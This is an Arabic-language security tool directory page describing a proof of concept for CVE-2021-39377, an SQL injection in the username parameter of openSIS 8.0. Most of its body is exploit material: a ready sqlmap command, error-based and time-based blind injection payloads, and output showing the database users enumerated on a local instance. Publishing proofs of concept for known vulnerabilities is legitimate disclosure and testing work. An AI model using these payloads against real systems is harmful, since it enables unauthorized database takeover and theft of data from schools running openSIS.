Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-39377 — إثبات المفهوم لـ CVE-2021-39377، وهي ثغرة حقن SQL في openSIS 8.0 عبر معامل اسم المستخدم، مما يتيح الاستيلاء على قاعدة البيانات من خلال هجمات قائمة على الأخطاء والهجمات العمياء القائمة على الوقت. | Kitploit
أدوات/GitHubGitHub/security-n/cve-2021-39377
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubsecurity-n/cve-2021-39377

CVE-2021-39377

إثبات المفهوم لـ CVE-2021-39377، وهي ثغرة حقن SQL في openSIS 8.0 عبر معامل اسم المستخدم، مما يتيح الاستيلاء على قاعدة البيانات من خلال هجمات قائمة على الأخطاء والهجمات العمياء القائمة على الوقت.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة حقن SQL في OPENSIS 8.0 CVE-2021-39377

توجد ثغرة حقن SQL في الإصدار 8.0 من openSIS عند استخدام MySQL (MariaDB) كقاعدة بيانات للتطبيق. يمكن للمهاجم الضار إصدار أوامر SQL لقاعدة بيانات MySQL (MariaDB) عبر المعامل username= الضعيف.

صفحة PHP المعرضة للخطر:

index.php - username parameter

الحمولة المستغلة:

sqlmap "http://localhost:8081/index.php" --users --data="USERNAME=admin&PASSWORD=test1234%21&language=en&log=" --dbms="MySQL" --level=3 --risk=2

حقن SQL:

http://localhost:8081/index.php

root@kitploit:~
Parameter: USERNAME (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: USERNAME=admin') AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(4391=4391,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IzoO&PASSWORD=test1234!&language=en&log=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: USERNAME=admin') AND (SELECT 2137 FROM (SELECT(SLEEP(5)))BwzJ)-- sbsL&PASSWORD=test1234!&language=en&log=

[22:35:47] [INFO] testing MySQL
[22:35:47] [INFO] confirming MySQL
[22:35:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[22:35:47] [INFO] fetching database users
database management system users [3]:
[*] 'mariadb.sys'@'localhost'
[*] 'mysql'@'localhost'
[*] 'root'@'localhost'

اكتشفها Nathan Johnson، أغسطس 2021

تنزيل الأداة